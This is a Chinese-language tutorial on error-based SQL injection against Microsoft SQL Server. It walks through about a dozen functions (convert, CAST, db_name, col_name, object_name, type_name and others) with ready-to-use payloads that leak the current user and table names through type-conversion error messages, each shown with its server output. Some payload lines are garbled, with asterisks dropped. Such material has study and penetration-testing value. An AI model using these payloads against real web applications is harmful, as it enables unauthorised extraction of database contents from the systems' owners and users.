- 0x01 前言
- 0x02 基础数据
- 0x03 算术运算符-爆错注入
- 0x04 convert(int,str) 函数-爆错注入
- 0x05 CAST(expressionASdata_type) 函数-爆错注入
- 0x06 db_name() 函数-爆错注入
- 0x07 COL_NAME(table_id , column_id) 函数-爆错注入
- 0x08 filegroup_name() 函数-爆错注入
- 0x09 object_name() 函数-爆错注入
- 0x10 suser_name() 函数-爆错注入
- 0x11 user_name() 函数 -爆错注入
- 0x12 schema_name() 函数-爆错注入
- 0x13 type_name() 函数-爆错注入
- 0x14 file_name() 函数-爆错注入
0x01 前言
报错注入利用的就是类型转换时发生的错误来进行注入
所以只要能够导致类型转换错误的函数/方法都可以用来进行爆错注入
但是最重要的呢,还是服务器要会把爆错的信息返回回来才行呢~
支持进行爆错注入得函数 |
---|
convert() |
CAST() |
db_name() |
col_name() |
filegroup_name() |
object_name() |
suser_name() |
user_name() |
schema_name() |
type_name() |
file_name() |
0x02 基础数据
1> select * from article;
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)
# 测试表数据: users;
sql server> select * from users;
+----+--------------+----------+
| id | username | password |
+----+--------------+----------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
+----+--------------+----------+
2 rows in set (0.00 sec)
sql server> SELECT system_user;
+-----------------------+
| field1 |
+-----------------------+
| sa |
+-----------------------+
1 row in set (0.00 sec)
sql server> select db_name();
+-----------------------+
| field1 |
+-----------------------+
| test |
+-----------------------+
1 row in set (0.00 sec)
0x03 算术运算符-爆错注入
也就是利用 + - * / 来进行注入
0x03.1 查询user
SQL:select from article where id=1 and 1=1user
# 查询 user
1> select * from article where id=1 and 1=1*user;
2> go
22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x03.2 查询表名
注意:
OVER(Order by table_name) 里面的 name 要修改为 test.dbo.sysobjects 表里面存在的一个字段
查询不同的库可以这样
例如现在有 test库 与 test2库
那么就可以这样调用
test.dbo.sysobjects
test2.dbo.sysobjects
查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2
注意:
XType=’U’ 表示获取某数据库的所有用户表;
XType=’S’ 表示获取某数据库的所有系统表;
例如现在查询得是 test 库得表名
SQL:select from article where id=1 and 1=1(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1)
# 爆表名
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = 1 * (
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
);
2> go
22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x04 convert(int,str) 函数-爆错注入
0x04.1 查询user
SQL:select from article where id=1 and 1=1convert(int,user)
1> select * from article where id=1 and 1=convert(int,user);
2> go
22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x04.2 查询表名
SQL:select * from article where id=1 and 1=(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1)
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = (
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
);
2> go
22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x05 CAST(expressionASdata_type) 函数-爆错注入
0x05.1 查询user
SQL:select * from article where id=1 and 1=cast(user as int)
1> select * from article where id=1 and 1=cast(user as int);
2> go
22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x05.2 查询表名
SQL:select * from article where id=1 and 1=cast((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1) as int)
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = CAST (
(
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
) AS INT
);
2> go
22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x06 db_name() 函数-爆错注入
0x06.1 查询user
SQL:select * from article where id=1 and 1=db_name(user)
1> select * from article where id=1 and 1=db_name(user);
2> go
22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x06.2 查询表名
SQL:select * from article where id=1 and 1=db_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = db_name(
(
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
)
);
2> go
22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x07 COL_NAME(table_id , column_id) 函数-爆错注入
0x07.1 查询user
SQL:select * from article where id=1 and 1=col_name(1,user)
1> select * from article where id=1 and 1=col_name(1,user);
2> go
22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x07.2 查询表名
SQL:select * from article where id=1 and 1=col_name(1,(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = col_name(
1,
(
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
)
);
2> go
22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x08 filegroup_name() 函数-爆错注入
0x08.1 查询user
SQL:select * from article where id=1 and 1=filegroup_name(user)
1> select * from article where id=1 and 1=filegroup_name(user);
2> go
22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 smallint 时失败。
0x08.2 查询表名
SQL:select * from article where id=1 and 1=filegroup_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
1> SELECT
*
FROM
article
WHERE
id = 1
AND 1 = filegroup_name(
(
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
)
);
2> go
22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 smallint 时失败。
0x09 object_name() 函数-爆错注入
0x09.1 查询user
SQL:select from article order by idobject_name(user)
1> select * from article order by id*object_name(user);
2> go
22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x09.2 查询表名
SQL:select from article order by idobject_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
1> SELECT
*
FROM
article
ORDER BY
id * object_name(
(
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
)
);
2> go
22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x10 suser_name() 函数-爆错注入
0x10.1 查询user
SQL:select from article order by idsuser_name(user)
1> select * from article order by id*suser_name(user);
2> go
22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x10.2 查询表名
SQL:select from article order by idsuser_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
1> SELECT
*
FROM
article
ORDER BY
id * suser_name(
(
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
)
);
2> go
22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x11 user_name() 函数 -爆错注入
0x11.1 查询user
SQL:select from article order by iduser_name(user)
1> select * from article order by id*user_name(user);
2> go
22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x11.2 查询表名
SQL:select from article order by iduser_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
1> SELECT
*
FROM
article
ORDER BY
id * user_name(
(
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
)
);
2> go
22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x12 schema_name() 函数-爆错注入
0x12.1 查询user
SQL:select * from article order by schema_name(user);
1> select * from article order by schema_name(user);
2> go
22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x12.2 查询表名
SQL:select * from article order by schema_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
1> SELECT
*
FROM
article
ORDER BY
schema_name(
(
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
)
);
2> go
22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。
0x13 type_name() 函数-爆错注入
0x13.1 查询user
SQL:select * from article order by type_name(user)
1> select * from article order by type_name(user);
2> go
22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x13.2 查询表名
SQL:select * from article order by type_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
SELECT
*
FROM
article
ORDER BY
type_name(
(
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
)
)
0x14 file_name() 函数-爆错注入
0x14.1 查询user
SQL:select * from article order by file_name(user)
1> select * from article order by file_name(user);
2> go
22018 - [SQL Server]在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
0x14.2 查询表名
SQL:select * from article order by file_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))
1> SELECT
*
FROM
article
ORDER BY
file_name(
(
SELECT
name
FROM
(
SELECT
ROW_NUMBER () OVER (ORDER BY name) AS row_number,
name
FROM
test.dbo.sysobjects
WHERE
XType = 'U'
) AS a
WHERE
row_number = 1
)
);
2> go
22018 - [SQL Server]在将 nvarchar 值 'article' 转换成数据类型 int 时失败。